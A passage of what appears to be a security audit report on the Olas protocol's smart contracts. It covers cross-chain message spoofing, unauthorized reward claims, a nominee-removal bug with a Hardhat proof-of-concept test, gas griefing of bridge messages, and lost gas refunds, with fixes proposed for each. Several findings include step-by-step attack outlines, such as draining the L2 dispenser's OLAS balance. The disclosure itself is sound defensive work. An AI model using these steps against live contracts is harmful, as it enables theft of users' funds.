            revert TargetRelayerOnly(msg.sender, l2TokenRelayer);
        }

        // Process the data
        _receiveMessage(l2MessageRelayer, l1DepositProcessor, data);
    }

It calls _receiveMessage(), which will process the data. Here the sender parameter is hard-coded to the default l1DepositProcessor, which means the contract does not verify which address on L1 actually performed the cross-chain transmission.

So a message with incorrect stakingIncentives can be sent by performing the same call on the l1TokenRelayer from a malicious contract.

GnosisDepositProcessorL1.sol#L63-L71

        // Transfer OLAS together with message, or just a message
        if (transferAmount > 0) {
            // Approve tokens for the bridge contract
            IToken(olas).approve(l1TokenRelayer, transferAmount);

            bytes memory data = abi.encode(targets, stakingIncentives);
            IBridge(l1TokenRelayer).relayTokensAndCall(olas, l2TargetDispenser, transferAmount, data);

            sequence = stakingBatchNonce;
        } 

Impact

Incorrect staking incentives can be passed to the L2. This can cause the dispenser to allocate OLAS to the incorrect staking targets via redeem.

For example, a malicious user can call the relayTokensAndCall function with an incorrect staking target and a staking incentive equal to the entire OLAS balance of the L2 dispenser. This allows the redeem function on the L2 dispenser to send its entire OLAS balance to that single staking target, draining it of its funds.

Tools Used

Manual

Recommended Mitigation Steps

Perform the token transmission separately from the message transmission so that _receiveMessage() does not need to be called in onTokenBridged().

Assessed type

Other

Unauthorized claiming of staking incentives for retainer

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/Dispenser.sol#L1162
https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/Dispenser.sol#L953

Vulnerability details

The Dispenser contract is responsible for distributing staking incentives to various targets. One of the functionalities provided by the contract is the ability to claim staking incentives for a specific staking target using the claimStakingIncentives() function. This function calculates the staking incentives for a given target and distributes them accordingly.

The retain() function, on the other hand, is designed to retain staking incentives for the retainer address and return them back to the staking inflation.

However, there is no check to ensure users cannot call the claimStakingIncentives() function for the retainer address and send the staking incentives to the retainer instead of returning them to the staking inflation.

This means anyone can divert the retainer rewards, which are meant to be sent back to the staking inflation, to the retainer itself. In that scenario, there is no way to return the funds to the staking inflation.

Impact

Loss of staking incentives that should have been returned to the staking inflation.

Proof of Concept

  1. An attacker calls the claimStakingIncentives() function with the retainer address as the staking target.
  2. The function calculates the staking incentives for the retainer address.
  3. Instead of returning the incentives to the staking inflation, the incentives are sent to the retainer address.
  4. The attacker successfully redirects the staking incentives to the retainer, bypassing the intended logic of the retain() function.

Tools Used

Manual review

Recommended Mitigation Steps

Restrict the claimStakingIncentives() function to prevent the claiming of rewards for the retainer address.
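
A minimal sketch of such a restriction near the top of claimStakingIncentives(), assuming the retainer is stored as a bytes32 retainer on the Dispenser; the WrongAccount error is hypothetical:

    // Disallow claiming for the retainer; its incentives must only be processed via retain()
    if (stakingTarget == retainer) {
        revert WrongAccount(stakingTarget);
    }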

Assessed type

Invalid Validation

Incorrect Handling of Last Nominee Removal in `removeNominee` Function

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/governance/contracts/VoteWeighting.sol#L622-L624

Vulnerability details

Summary

A vulnerability was discovered in the removeNominee function of the VoteWeighting.sol contract. The issue arises when removing the last nominee from the list, resulting in an incorrect update of the mapNomineeIds mapping. This can lead to inconsistencies in nominee management, potentially causing data corruption and unexpected behavior in the contract.

Impact

The vulnerability impacts the integrity of the mapNomineeIds mapping. When the last nominee in the setNominees array is removed, its ID is incorrectly reassigned, leaving a stale entry in mapNomineeIds. This can lead to:

  • Inability to clear the ID of the removed nominee.
  • Potential data corruption if new nominees are added and removed subsequently.
  • Unexpected behavior when querying or managing nominees.

Proof of Concept

In the removeNominee function, the following code is responsible for updating the mapNomineeIds mapping and handling the removal of the nominee:

contracts/VoteWeighting.sol:
  618:         // Remove nominee from the map
  619:         mapNomineeIds[nomineeHash] = 0;
  620: 
  621:         // Shuffle the current last nominee id in the set to be placed to the removed one
  622:         nominee = setNominees[setNominees.length - 1];
  623:         bytes32 replacedNomineeHash = keccak256(abi.encode(nominee));
  624:         mapNomineeIds[replacedNomineeHash] = id;
  625:         setNominees[id] = nominee;
  626:         // Pop the last element from the set
  627:         setNominees.pop();

The above code aims to remove a nominee by zeroing out its ID in the mapNomineeIds mapping and then reassigning the ID of the last nominee in the setNominees array to fill the gap left by the removed nominee. However, this logic fails to handle the case where the nominee being removed is the last one in the setNominees array. In such cases:

  1. Line 619 correctly sets the nominee's ID to 0 in mapNomineeIds.
  2. Lines 621-623 fetch the last nominee in the setNominees array.
  3. Lines 624-625 incorrectly reassign the ID of the last nominee, which is the nominee being removed, back to the mapNomineeIds mapping.

This results in a stale ID entry in mapNomineeIds, leaving the system in an inconsistent state. The following code snippet checks for nominee existence, which demonstrates the impact of the stale ID:

contracts/VoteWeighting.sol:
  805:             // Check for nominee existence
  806:             if (mapNomineeIds[nomineeHash] == 0) {
  807:                 revert NomineeDoesNotExist(accounts[i], chainIds[i]);
  808:             }

If the stale ID remains in mapNomineeIds, this check will fail to correctly identify that the nominee no longer exists, potentially leading to unexpected behavior or errors in other contract functions.

Test Case (Hardhat)

The following PoC demonstrates the issue using Hardhat. Add it to the governance/test test suite.

`governance/test/VoteWeightingPoC.js`
/*global describe, context, beforeEach, it*/

const { expect } = require("chai");
const { ethers } = require("hardhat");
const helpers = require("@nomicfoundation/hardhat-network-helpers");

describe("Vote Weighting PoC", function () {
    let olas;
    let ve;
    let vw;
    let signers;
    let deployer;
    const initialMint = "1000000000000000000000000"; // 1_000_000
    const chainId = 1;


    function convertAddressToBytes32(account) {
        return ("0x" + "0".repeat(24) + account.slice(2)).toLowerCase();
    }

    beforeEach(async function () {
        const OLAS = await ethers.getContractFactory("OLAS");
        olas = await OLAS.deploy();
        await olas.deployed();

        signers = await ethers.getSigners();
        deployer = signers[0];
        await olas.mint(deployer.address, initialMint);

        const VE = await ethers.getContractFactory("veOLAS");
        ve = await VE.deploy(olas.address, "Voting Escrow OLAS", "veOLAS");
        await ve.deployed();

        const VoteWeighting = await ethers.getContractFactory("VoteWeighting");
        vw = await VoteWeighting.deploy(ve.address);
        await vw.deployed();
    });

    context("Remove nominee", async function () {
        
        it("Removing last element in nominee list, will leave its id in the `mapNomineeIds`", async function () {
            // Take a snapshot of the current state of the blockchain
            const snapshot = await helpers.takeSnapshot();

            const numNominees = 2;
            // Add nominees and get their bytes32 addresses
            let nominees = [signers[1].address, signers[2].address];
            for (let i = 0; i < numNominees; i++) {
                await vw.addNomineeEVM(nominees[i], chainId);
                nominees[i] = convertAddressToBytes32(nominees[i]);
            }

            // Get the id of the second nominee
            let id = await vw.getNomineeId(nominees[1], chainId);
            // The id must be equal to 2
            expect(id).to.equal(2);

            // Remove the last nominee in the list
            await vw.removeNominee(nominees[1], chainId);

            // The id was not cleared
            id = await vw.getNomineeId(nominees[1], chainId);
            // The id is still equal to 2
            expect(id).to.equal(2);

            // Now, when a user calls `getNextAllowedVotingTimes` with the removed nominee,
            // it should revert with the `NomineeDoesNotExist` error, but the call succeeds without reverting
            await vw.getNextAllowedVotingTimes(
                [nominees[0], nominees[1]],
                [chainId, chainId],
                [deployer.address, deployer.address]
            );

            // However, there is no way to clear it from `mapNomineeIds`
            // If the owner tries to remove it again, it will revert, since there is no nominee at its index
            await expect(
                vw.removeNominee(nominees[1], chainId)
            ).to.be.revertedWithPanic(0x32); //"Array accessed at an out-of-bounds or negative index"

            // But if the owner tries to remove it after a new nominee has been added in its place,
            // it will remove that other nominee instead, causing further data corruption
            nominees[2] = signers[3].address;
            await vw.addNomineeEVM(nominees[2], chainId);
            nominees[2] = convertAddressToBytes32(nominees[2]);

            let nominees1Id = await vw.getNomineeId(nominees[1], chainId);
            let nominees2Id = await vw.getNomineeId(nominees[2], chainId);
            expect(nominees1Id).to.equal(nominees2Id);

            // Removing the already-removed nominee will not revert now
            await vw.removeNominee(nominees[1], chainId);

            // The nominee actually removed (from setNominees) is nominees[2]
            await expect(
                vw.getNominee(nominees2Id)
            ).to.be.revertedWithCustomError(vw, "Overflow");

            // Restore to the state of the snapshot
            await snapshot.restore();
        });
    });
});

Tools Used

  • Hardhat

Recommended Mitigation Steps

To mitigate this vulnerability, an additional check should be implemented to ensure that the nominee being removed is not the last one in the setNominees array. If it is, the reassignment of the nominee ID should be skipped. Here is a proposed fix in the form of a git diff:

     // Shuffle the current last nominee id in the set to be placed to the removed one
+    if (id != setNominees.length - 1) {
         nominee = setNominees[setNominees.length - 1];
         bytes32 replacedNomineeHash = keccak256(abi.encode(nominee));
         mapNomineeIds[replacedNomineeHash] = id;
         setNominees[id] = nominee;
+    }
     // Pop the last element from the set
     setNominees.pop();

This fix ensures that the ID reassignment is only performed if the removed nominee is not the last one in the array, thus preserving the integrity of the mapNomineeIds mapping.

Assessed type

Other

syncWithheldTokens on Arbitrum could fail to be delivered

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/staking/DefaultTargetDispenserL2.sol#L323-L345

Vulnerability details

Vulnerability Detail

The execution flow begins on ArbitrumTargetDispenserL2, in the syncWithheldTokens() function. Any user can call this function to sync the withheld token amount with L1. However, if the user crafts a msg.value for the call on L2 that is enough to proceed on L2 but not enough for the message to be delivered on L1, the transaction could fail.

Proof of Concept

The msg.value that the user provides on L2 will be used to execute the call on L1. This can be seen in L2ToL1MessageNitro.ts in the Arbitrum SDK, where callvalue is the msg.value:

return await outbox.executeTransaction(
      proof,
      this.event.position,
      this.event.caller,
      this.event.destination,
      this.event.arbBlockNum,
      this.event.ethBlockNum,
      this.event.timestamp,
      this.event.callvalue,
      this.event.data,
      overrides || {}
    )
  }

Consequently, the executeBridgeCall() function in Outbox.sol will be triggered on L1:

function executeBridgeCall(
        address to,
        uint256 value,
        bytes memory data
    ) internal {
        (bool success, bytes memory returndata) = bridge.executeCall(to, value, data);

In the bridge, this triggers the following logic:

(success, returnData) = to.call{value: value}(data);

So everything depends on the supplied msg.value, and if the transaction fails to execute (e.g. due to an out-of-gas error), it will not be possible to re-execute it.

Impact

The transaction could fail on L1, but the withheldAmount would already be set to 0 on L2 (the result of a successful L2-side execution). Consequently, the DAO will be forced to manually restore the data.

Recommendation

Ensure that enough msg.value is passed on L2, or ensure that only whitelisted users can call this function.
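
A minimal sketch of the second option, placed at the top of syncWithheldTokens(); it assumes the contract's existing owner variable and an OwnerOnly-style error:

    // Only allow a whitelisted account (here, the owner) to trigger the L2 -> L1 sync
    if (msg.sender != owner) {
        revert OwnerOnly(msg.sender, owner);
    }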

Assessed type

Other

No limit on maximum number of `stakingTargets` for `claimStakingIncentivesBatch`

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/Dispenser.sol#L1058

Vulnerability details

There is no maximum limit for the number of stakingTargets for the permissionless claimStakingIncentivesBatch when sending the cross-chain transaction.

When the claimStakingIncentivesBatch data is received on the L2, the gas required grows linearly with the number of stakingTargets as seen in the for loop below

DefaultTargetDispenserL2.sol#L154-L213

    function _processData(bytes memory data) internal {
        ...
        // Traverse all the targets
        for (uint256 i = 0; i < targets.length; ++i) {
            ...
        }
        ...
    }

Impact

Therefore, a user can purposely cause the cross-chain message to fail by including so many staking targets that processing them exceeds the block gas limit on the L2. This is possible because claimStakingIncentivesBatch lacks a check on the maximum number of staking targets - https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/Dispenser.sol#L1058

Tools Used

Manual Review

Recommended Mitigation Steps

Enforce a reasonable maximum limit for the number of staking targets that can be passed in claimStakingIncentivesBatch.
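
For example (the MAX_STAKING_TARGETS constant and its value are hypothetical and should be tuned to the gas limits of the target L2s; the Overflow-style error is assumed):

    // Hypothetical upper bound on the number of targets per chain in a claim batch
    uint256 public constant MAX_STAKING_TARGETS = 100;

    // Inside claimStakingIncentivesBatch(), for each chain's list of targets
    if (stakingTargets[i].length > MAX_STAKING_TARGETS) {
        revert Overflow(stakingTargets[i].length, MAX_STAKING_TARGETS);
    }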

Assessed type

Other

Attacker can make claimed staking incentives irredeemable on Gnosis Chain

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/staking/GnosisDepositProcessorL1.sol#L77
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/staking/GnosisDepositProcessorL1.sol#L90

Vulnerability details

The GnosisDepositProcessorL1 contract is responsible for bridging OLAS tokens and messages from L1 to the GnosisTargetDispenserL2 contract on Gnosis Chain. When calling claimStakingIncentives() or claimStakingIncentivesBatch() on the Dispenser contract for a nominee on Gnosis, it calls _sendMessage() internally to send the incentive amounts and any necessary funds to L2.

If the transferAmount has been reduced to 0 due to sufficient withheld funds on Gnosis, it only sends a message via the Arbitrary Message Bridge (AMB) to process the claimed incentives.

However, when sending this message, the caller provides a gasLimitMessage parameter to specify the gas limit for executing the message on L2. There is no lower bound enforced on this value, although it is required to be >= 100 internally by the AMB. If the caller sets gasLimitMessage too low, the message will fail to execute on L2 due to out of gas.

Because the Gnosis AMB provides no native way to replay failed messages, if a message fails due to insufficient gas, the claimed staking incentives will be irredeemable on L2. An attacker could intentionally grief the protocol by repeatedly claiming incentives with an insufficient gas limit, causing them to be lost.

While the protocol could call processDataMaintenance() on L2 with the data from the cancelled message to recover, this would require passing a governance proposal. Given that this attack can be carried out any number of times (e.g. as often as possible and with a different target each time), it can considerably impact the functioning of the protocol, hence I believe Medium severity is justified.

Impact

An attacker can make legitimately claimed staking incentives irredeemable on L2 by setting an insufficient gas limit when claiming. This would require governance intervention each time to recover the lost incentives.

Proof of Concept

  1. Some amount of OLAS is withheld in the GnosisTargetDispenserL2 contract
  2. The amount is synced to the Dispenser on L1 via GnosisTargetDispenserL2.syncWithheldTokens()
  3. Attacker calls claimStakingIncentives() on the Dispenser contract for a nominee on Gnosis Chain that has accumulated less rewards than the withheld amount, providing an insufficient gasLimitMessage in the bridgePayload
  4. Message is sent via AMB but fails to execute on L2 due to out of gas
  5. Claimed staking incentives are now stuck and irredeemable on L2

Tools Used

Manual review

Recommended Mitigation Steps

Do not allow users to directly specify the gasLimitMessage. Instead, have the GnosisDepositProcessorL1 contract calculate the required gas based on the number of targets and stakingIncentives being processed. A small buffer can be added to account for any minor differences in gas costs.
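
A minimal sketch of such a calculation in GnosisDepositProcessorL1._sendMessage(); the per-target and overhead figures are hypothetical and would need to be benchmarked against _processData() on L2:

    // Hypothetical gas figures to be benchmarked against L2 execution costs
    uint256 public constant GAS_PER_TARGET = 200_000;
    uint256 public constant GAS_OVERHEAD = 300_000;

    // Inside _sendMessage(): derive the gas limit from the number of targets plus a buffer
    uint256 gasLimitMessage = targets.length * GAS_PER_TARGET + GAS_OVERHEAD;
    IBridge(l1MessageRelayer).requireToPassMessage(l2TargetDispenser, data, gasLimitMessage);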

Alternatively, implement a way to replay failed messages from the AMB, so that irredeemable incentives can be recovered without requiring governance intervention.

Assessed type

Other

Staked service will be irrecoverable by owner if not an ERC721 receiver

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingBase.sol#L864

Vulnerability details

The StakingBase contract allows users to stake services represented by ERC721 tokens. These services are freely transferable, meaning they could be staked by contracts that do not implement the ERC721TokenReceiver interface.

When a user calls unstake() to withdraw their staked service, the contract attempts to transfer the ERC721 token back to the msg.sender (which must match the original depositor) using safeTransferFrom():

File: StakingBase.sol
862:         // Transfer the service back to the owner
863:         // Note that the reentrancy is not possible due to the ServiceInfo struct being deleted
864:         IService(serviceRegistry).safeTransferFrom(address(this), msg.sender, serviceId);

However, if the owner is a contract that does not support receiving ERC721 tokens, this transfer will fail. As a result, the service associated with serviceId will be permanently locked in the StakingBase contract, and the original owner will be unable to recover it.

Impact

Staked services will become permanently irrecoverable if the owner cannot receive ERC721 tokens.

Proof of Concept

  1. User stakes a service by calling stake(serviceId) on the StakingBase contract from a smart contract that is not an ERC721TokenReceiver, and cannot be upgraded to support this (e.g. a Safe with restricted privileges). The service is transferred from the user to the contract.
  2. When the user later tries to unstake and recover their service by calling unstake(serviceId), the safeTransferFrom() call in the function reverts.
  3. The service remains locked in the StakingBase contract indefinitely, and the user is unable to recover it.

Tools Used

Manual review

Recommended Mitigation Steps

Consider using transferFrom() instead of safeTransferFrom() when transferring the service back to the owner in unstake(). This will allow the transfer to succeed even if the recipient is not an ERC721 receiver.
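
A minimal sketch of the change in unstake(), assuming the IService interface is extended to expose transferFrom():

         // Transfer the service back to the owner
-        IService(serviceRegistry).safeTransferFrom(address(this), msg.sender, serviceId);
+        IService(serviceRegistry).transferFrom(address(this), msg.sender, serviceId);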

Assessed type

ERC721

Service with pending rewards can't unstake even when it's more profitable to forgo the reward

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingBase.sol#L867-L869
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingToken.sol#L104-L111
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingNativeToken.sol#L28-L37

Vulnerability details

Relevant code: StakingBase::unstake, StakingToken::_withdraw, StakingNativeToken::_withdraw

Description

The unstake function ensures that the unstaking service collects any pending rewards:

if (reward > 0) {
    _withdraw(multisig, reward);
}

The _withdraw implementation differs depending on whether the Staking contract distributes tokens or native currency as rewards, but it essentially boils down to subtracting the reward from the current balance and transferring it to the service multisig - balance -= amount;.

The mandatory collection of the reward can cause the service to remain staked for much longer than its owner intended. Consider a situation where the Staking contract has no funds to distribute and all calls to unstake revert due to an underflow in the _withdraw function: balance -= amount;.

Root Cause

Lack of a force-unstake mechanism that forfeits rewards so that the service owner can stake elsewhere.

Impact

Having a Staking contract without funds to distribute can be especially damaging in cases where multiple services are staked with pending rewards. In such situations, owners will either have to wait for new rewards without any guarantee of new funds arriving, or they will have to deposit funds themselves so they can unstake. The second option puts their funds at risk, as another service could use their deposit to unstake before them.

The lack of a force unstake creates a peculiar situation where service owners could incur an opportunity loss or potentially have to pay to unstake (with the risk of losing funds).

PoC

Let's suppose the following turn of events:

  • Staking contract stops receiving regular funding
  • Services have rewards pending that are more than the current balance in the contract.
  • Service owners can't unstake and move to a more profitable Staking contract.
  • If a service owner deposits in the Staking contract themselves, they could get frontrun by another owner and lose their funds.

Suggested Mitigation

Add a forceUnstake flag that allows unstaking without receiving the pending rewards. It could look something like this:

if (forceUnstake) {
	sInfo.reward = 0;
	reward = 0;
} else if (reward > 0) {
	_withdraw(multisig, reward);
}

Assessed type

DoS

`pointsSum.slope` Not Updated After Nominee Removal and Votes Revocation

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/governance/contracts/VoteWeighting.sol#L586-L637
https://github.com/code-423n4/2024-05-olas/blob/main/governance/contracts/VoteWeighting.sol#L223-L249

Vulnerability details

Issue Description

The removeNominee and revokeRemovedNomineeVotingPower functions are part of the governance mechanism in the VoteWeighting.sol smart contract.

  • The removeNominee function removes a nominee from the voting system.
  • The revokeRemovedNomineeVotingPower function revokes the voting power that a user has delegated to a nominee who has been removed.

When a user votes for a nominee using the voteForNomineeWeights function, both pointsSum.slope and pointsSum.bias are updated to reflect the new voting weights:

pointsWeight[nomineeHash][nextTime].bias = _maxAndSub(_getWeight(account, chainId) + newBias, oldBias);
pointsSum[nextTime].bias = _maxAndSub(_getSum() + newBias, oldBias);
if (oldSlope.end > nextTime) {
    pointsWeight[nomineeHash][nextTime].slope =
        _maxAndSub(pointsWeight[nomineeHash][nextTime].slope + newSlope.slope, oldSlope.slope);
    pointsSum[nextTime].slope = _maxAndSub(pointsSum[nextTime].slope + newSlope.slope, oldSlope.slope);
} else {
    pointsWeight[nomineeHash][nextTime].slope += newSlope.slope;
    pointsSum[nextTime].slope += newSlope.slope;
}

However, when a nominee is removed by the owner through the removeNominee function, only pointsSum.bias is updated. pointsSum.slope is not updated, nor is it updated when users revoke their votes through the revokeRemovedNomineeVotingPower function. As a result, the pointsSum.slope for the next timestamp will be incorrect as it still includes the removed nominee's slope.

When the _getSum() function is called later to perform a checkpoint, the incorrect slope will be used for the calculation, causing the voting weight logic to become inaccurate:

function _getSum() internal returns (uint256) {
    // t is always > 0 as it is set in the constructor
    uint256 t = timeSum;
    Point memory pt = pointsSum[t];
    for (uint256 i = 0; i < MAX_NUM_WEEKS; i++) {
        if (t > block.timestamp) {
            break;
        }
        t += WEEK;
        uint256 dBias = pt.slope * WEEK;
        if (pt.bias > dBias) {
            pt.bias -= dBias;
            uint256 dSlope = changesSum[t];
            pt.slope -= dSlope;
        } else {
            pt.bias = 0;
            pt.slope = 0;
        }

        pointsSum[t] = pt;
        if (t > block.timestamp) {
            timeSum = t;
        }
    }
    return pt.bias;
}

Impact

The voting weight logic will be inaccurate after a nominee is removed, potentially compromising the integrity of the governance mechanism.

Tools Used

Manual review, VS Code

Recommended Mitigation

To address this issue, ensure that pointsSum.slope is updated when a nominee is removed. This can be done in either the removeNominee or revokeRemovedNomineeVotingPower functions to maintain correct accounting.
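
One possible direction, shown as a heavily simplified sketch inside removeNominee() (it assumes nomineeHash and nextTime are computed as in the existing function, and it does not cover the scheduled slope changes in changesSum that may also need adjusting):

    // Remove the nominee's remaining slope from the sum so future checkpoints decay correctly
    uint256 oldSlope = pointsWeight[nomineeHash][nextTime].slope;
    pointsWeight[nomineeHash][nextTime].slope = 0;
    pointsSum[nextTime].slope = _maxAndSub(pointsSum[nextTime].slope, oldSlope);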

Assessed type

Error

User's gas fees for Arbitrum messages are not refunded and will be lost

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/ArbitrumDepositProcessorL1.sol#L136
https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/WormholeDepositProcessorL1.sol#L85

Vulnerability details

In ArbitrumDepositProcessorL1._sendMessage(), if the refundAccount is not explicitly set by the user, it defaults to msg.sender:

File: ArbitrumDepositProcessorL1.sol
134:         // If refundAccount is zero, default to msg.sender
135:         if (refundAccount == address(0)) {
136:             refundAccount = msg.sender;
137:         }

However, this address will always be the Dispenser contract making the call on behalf of the user, as verified in the super.sendMessage() entry point. This means any refunds will go to the Dispenser contract on L2 (or more specifically, to its L2 aliased address) rather than the user.

The same issue is present in WormholeDepositProcessorL1.

Impact

Users will lose any excess gas fees they send as part of their token deposits. Since users cannot precisely estimate the gas required, they are incentivized to err on the side of overpaying to ensure their deposit succeeds. All this overpaid amount will be lost.

Proof of Concept

  1. User calls claimStakingIncentives() on the Dispenser contract to send staking incentives to L2 without specifying a refundAccount.
  2. Dispenser calls _sendMessage() on ArbitrumDepositProcessorL1, passing in the deposit data.
  3. Since no refundAccount was specified, it defaults to msg.sender which is the Dispenser contract.
  4. outboundTransferCustomRefund() is called on the Arbitrum L1GatewayRouter to bridge the tokens as well as createRetryableTicket() on the Inbox, with the Dispenser set as the refundAccount.
  5. On L2, excess gas is refunded to the aliased Dispenser contract.
  6. The excess gas is not refunded to the user, and the Dispenser contract lacks functionality to rescue excess funds sent to its aliased address on Arbitrum.

Tools Used

Manual review

Recommended Mitigation Steps

Instead of defaulting refundAccount to msg.sender, use tx.origin. This will ensure any refunds go to the original user initiating the deposit at the very beginning of the call chain.
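
A minimal sketch of the suggested change against the excerpt above (note that relying on tx.origin comes with its own trade-offs, e.g. for users interacting through smart contract wallets):

         // If refundAccount is zero, default to the original caller rather than the Dispenser
         if (refundAccount == address(0)) {
-            refundAccount = msg.sender;
+            refundAccount = tx.origin;
         }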

Assessed type

ETH-Transfer

Refunds for unconsumed gas will be lost due to incorrect refund chain ID

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/staking/WormholeDepositProcessorL1.sol#L97

Vulnerability details

The WormholeDepositProcessorL1 contract allows sending tokens and data via the Wormhole bridge from L1 to L2. It uses the sendTokenWithPayloadToEvm() function from the TokenBase contract in the Wormhole Solidity SDK to send the tokens and payload.

The sendTokenWithPayloadToEvm() function takes several parameters, including:

  • targetChain - the Wormhole chain ID of the destination chain
  • refundChain - the Wormhole chain ID of the chain where refunds for unconsumed gas should be sent

In the WormholeDepositProcessorL1._sendMessage() function, the refundChain parameter is incorrectly set to l2TargetChainId, which is the EVM chain ID of the receiving L2 chain:

File: WormholeDepositProcessorL1.sol
94:         // The token approval is done inside the function
95:         // Send tokens and / or message to L2
96:         sequence = sendTokenWithPayloadToEvm(uint16(wormholeTargetChainId), l2TargetDispenser, data, 0,
97:             gasLimitMessage, olas, transferAmount, uint16(l2TargetChainId), refundAccount);

However, it should be set to wormholeTargetChainId, which is the Wormhole chain ID classification corresponding to the L2 chain ID. Passing l2TargetChainId as the refundChain and casting it to uint16 will lead to refunds for unconsumed gas being sent to an altogether different chain (only if they are sufficient to be delivered, as explained in the Wormhole docs here) or lost.

Impact

Refunds for unconsumed gas paid by users when sending tokens from L1 to L2 via the Wormhole bridge will likely be lost. This results in users overpaying for gas.

Proof of Concept

  1. User calls claimStakingIncentives() on the Dispenser contract for a nominee on Celo
  2. WormholeDepositProcessorL1._sendMessage() is called internally, which calls TokenBase.sendTokenWithPayloadToEvm()
  3. The refundChain parameter in sendTokenWithPayloadToEvm() is set to l2TargetChainId instead of wormholeTargetChainId
  4. Refunds for unconsumed gas are sent to the wrong chain ID or lost

Tools Used

Manual review

Recommended Mitigation Steps

Change the refundChain parameter in the sendTokenWithPayloadToEvm() call to use wormholeTargetChainId instead of l2TargetChainId.
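
A minimal sketch of the change against the excerpt above:

         sequence = sendTokenWithPayloadToEvm(uint16(wormholeTargetChainId), l2TargetDispenser, data, 0,
-            gasLimitMessage, olas, transferAmount, uint16(l2TargetChainId), refundAccount);
+            gasLimitMessage, olas, transferAmount, uint16(wormholeTargetChainId), refundAccount);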

Assessed type

Other
